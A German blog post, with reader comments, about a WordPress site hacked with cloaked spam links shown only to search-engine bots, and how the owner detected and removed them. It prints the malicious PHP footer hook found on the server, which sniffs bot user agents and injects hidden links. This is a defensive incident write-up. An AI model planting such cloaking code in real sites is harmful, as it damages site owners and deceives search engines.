Mediengestalter Blog gehackt und keiner hats gemerkt (WordPress Exploit)

Google-search-results-cloaking-wordpress-exploit-300x87 in Mediengestalter Blog gehackt und keiner hats gemerkt (Wordpress Exploit)

Der Mediengestalter-Weblog wurde durch einen fiesen Exploit von WordPress gehackt. Die Sicherheitslücke wurde von mir geschlossen leider aber sind mir durch diesen Hack die Suchmaschinenpositionen abgeraucht. Es handelt sich um ein Spam-Hack, der mir in den Footer diverse unsichtbare Links einfügte. Das besonders hinterlistige war allerdings, dass die Links ausschließlich für den Googlebot sichtbar waren und somit kaum gefunden werden konnten. Zusätzlich wurde mit CSS der Content mit display:none ausgeblendet. Die einfachste Möglichkeit den Spam zu entdecken ist sich den Google-Cache in Text-Version anzuschauen.

site:www.mediengestalter-weblog.de

Cloaking-footer-text-300x73 in Mediengestalter Blog gehackt und keiner hats gemerkt (Wordpress Exploit)

Eine weitere Methode den Spam zu entdecken, ist sich bei den Google Webmaster Tools anzumelden.

Google Webmaster Tools

Stutzig wurde ich, als ich gesehen habe, dass sich mein Blog laut Google Webmaster-Tools hauptsächlich mit dem Thema Viagra, Herbal oder Generic befassen soll.

Google-webmaster-tools-content-exploit-300x185 in Mediengestalter Blog gehackt und keiner hats gemerkt (Wordpress Exploit)

Ich kann jedem nur raten seine WordPress Version immer auf dem aktuellsten Stand zu halten. Die Cracker werden immer einfallsreicher und hinterlistiger. Somit konnte ich leider auch nicht heraus finden wer hinter dieser Attacke stand.

Bewerbung um eine Reinclusion bei Google

Ich werde heute noch einen Reinclusion Request bei Google starten.

Hier der Link unter dem man einen Reinclusion Request starten kann.

Footer Spam HTML


<div id="_wp_footer">
...
Über 300 Spam Links
...
</div>

Verlinkt wurde z.B. auf

http://itp.nyu.edu/%7Eja771/emp/index.php?catid=3710
http://web.honorscollege.cuny.edu/seminars/liu07/?ucla=300
http://web.honorscollege.cuny.edu/seminars/liu07/?ucla=466

Anhang

Den Linux by Examples Blog hat es auch erwischt. Hier konnte bisher auch keiner herausfinden, wer hinter diesen Hack steht.

Who is behind this?
Seriously We don’t know, but based on what we have, we make some guess, feel free to give yours.

From the spam injection, we observed that the spam links appended with a modified google adsense script with key pub-7652328300112263. Who’s key is that? Do he steal your income as well as messing your google index? Only google adsense team would able to answer this.

Tipp Google Bot Simulator:

Wer seine Seite nach unerwünschten Spam im Google-Index durchsuchen möchte, kann über den Google-Bot-Simulator seine Seite ansehen, wie sie der Googlebot sieht.

Wie wird man den Spam Hack wieder los?

Das ist leider nicht so einfach, da sich der Hack tief ins System frisst und nahezu überall seine Dateien hinterlegen kann. Daher empfehle ich eine komplett Neuinstallation von WordPress mit der aktuellsten Version. Dabei sollten alle bisher verwendeten Plugins gelöscht werden und neuinstalliert werden, da auch dort der Hack sein Unwesen getrieben haben kann.

Infizierte Orte können sein:

/wp-content/uploads
/wp-content/plugins
/wp-content/themes
/wp-includes
/wp-admin
/ etc...

Mit einigen Stunden Suche habe ich als einzigen Hinweis noch die Funktion „echo123“ entdeckt, welche über die WordPress-Funktion add_action() hinzugefügt wird.

add_action('wp_footer','wpc7c16b8466d864eeefd20050625c7775');
function
wpc7c16b8466d864eeefd20050625c7775() {
$seau=array("google","yahoo","slurp","msn","live","ask","altavista","aol");
$sebot=""; foreach($seau as $ua) if(strpos(strtolower($_SERVER['HTTP_USER_AGENT']),$ua)!==false){ $sebot="1"; break; }
if(!(
$sebot==1 && sizeof($_COOKIE)==0)) return;
@include(
'./wp-includes/class-mail.php');
if(
sizeof($wparr)>0){
echo
"<div id=\"_wp_footer\">";
foreach(
$wparr as $k=>$v){
echo
"<a href=\"".$v['url']."\" title=\"".ucwords($v['key'])."\">".ucwords($v['key'])."</a>\n";
if(
$i++==$inum) break;
}
echo
"</div>".$_footer;
}
}

Quellen und Tips zu diesem WordPress Link Spam Exploit:

http://www.village-idiot.org
http://technorati.com
http://googlewebmastercentral.blogspot.com
http://blogsecurity.net
http://playground.ebiene.de
http://www.teohuiming.name
http://www.prefblog.com

 

Tarif Vergleich

Vincent

 

9 thoughts on “Mediengestalter Blog gehackt und keiner hats gemerkt (WordPress Exploit)

  1. Uns hat vor einigen Woche das gleiche „Schicksal“ ereilt. Obwohl wir alle WordPress-Updates relativ zeitnah umsetzen, war ganz offensichtlich solch ein Hacker-Angriff erfolgreich. Ist eine Neuinstallation tatsächlich zwingend notwendig?

  2. Wenn der Hacker einmal Zugriff auf den Quellcode hat, kann er nach belieben Dateien verändern und den Hack in jeder beliebigen Datei verstecken. Ich würde daher zu einer Neuinstallation raten. Man kann natürlich auch die add_action() Funktion manipulieren, dass sie echo123 im Footer nicht mehr ausführt. Ist aber nicht so sauber und beim nächsten Update könnte das mit etwas Pech wieder überschrieben werden. Eine Neuinstallation ist gar nicht so kompliziert. Die Datenbank kann weites gehend vorhanden bleiben. Du löschst die Programmdateien (nicht Uploads etc.), lädst die neueste WP Version 2.6.3 (derzeit) hoch und führst das Update Script aus. Dann noch ein paar Feinheiten bei den Plugins und Themes anpassen, je nach Bedürfnis. Dann sollte es klappen.

  3. Eine Frage, denn es hat mich auch erwischt: welche WordPress Version hast du eingesetzt als es passiert ist? Ich hatte nämlich Version 2.7 installiert und halte es für unwahrscheinlich, dass der Hack schon länger in meinem Blog haust. Hatte seit Anfang Februar ebenfalls einen enormen Rückgang der Googlebesucher und gestern dann in den Webmastertools die komischen Keywords gesehen …

    Grüße

  4. Hallo Sebbi,
    ich glaube es liegt gar nicht an der WordPress Version. Selbst wenn du dein WordPress aktualisiert hast, kann es sein, dass der Hacker über einen versteckten Administrator-Account auf dein Blog Zugriff bekommt. Schau mal bei dir in der Datenbank in phpmyadmin, ob dort irgendwo ein Administrator erscheint, der da nicht hingehört. Im WordPress-Backend gibt es einen kleinen Hinweis darauf, wenn du oben z.B. „Administratoren (2)“ zu stehen hast, obwohl nur einer in der Liste angezeigt wird. Falls das der Fall ist, lösche den User manuell aus der Datenbank und installier dein WordPress inkl. Templates komplett neu. Die Datebank muss natürlich vorhanden bleiben. Mach dir aber vorher unbedingt ein Backup der Daten.

    Der Hacker kann auch z.B. über eine Sicherheitslücke in einem Theme Zugriff auf den Webspace bekommen haben.

    Zur Info: ich hatte damals WordPress 1.5. Aber mit der 2.7.1. Version kann dir das genauso passieren, da der Hacker bereits vorher unbemerkt an einer anderen Stelle ein Sicherheitsloch geöffnet haben kann.

  5. Hallo Vincent,

    ich hatte in der Tat einen versteckten Adminaccount. Allerdings glaube ich, dass den der Hack selbst angelegt hat. Zumindest entspricht das den Beschreibungen anderer.

    Das komische an der ganzen Sache ist, dass bei uns auch ein privates Blog infiziert war, das per .htaccess Passwortabfrage geschützt ist. Es hatte keine seltsamen Datenbankeinträge, aber die „Plugindateien“ waren vorhanden.

    Grüße

  6. @Sebbi
    Es sei denn, die Injektion ist gar nicht über den Blog, sondern wie ich es vermute, über FTP reingekommen.

    OFF: Schade, dass hier keine Benachrichtigung eingebaut ist, wäre gerne bei der Diskussion dabei gewesen.

  7. Immer wieder hört man von so fiese Hackern, die nichts besseres zu tun haben als unschuldigen Webseiten zu hacken. Vielleicht ein Tip: Ein Bekannter hatte ein ähnliches Problem. Er ist dann auf http://www.hackalarm24.com gestossen und die haben dem dann durch verschiedenste Änderungen in der Konfigurationen ein Ende gesetzt. Vielleicht hilfreich, solltest du häufiger Probleme haben.

  8. Vielen Dank für die gut geschriebenen Hinweise. Werden jetzt auf jeden Fall mal unsere WordPress – Blogs kontrollieren. Richtig schlau bin ich aber jetzt nicht geworden bzgl. woher der Angriff kam.
    P.s. Eine Benachrichtigung um die Kommmentare zu verfolgen wäre super !!!

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.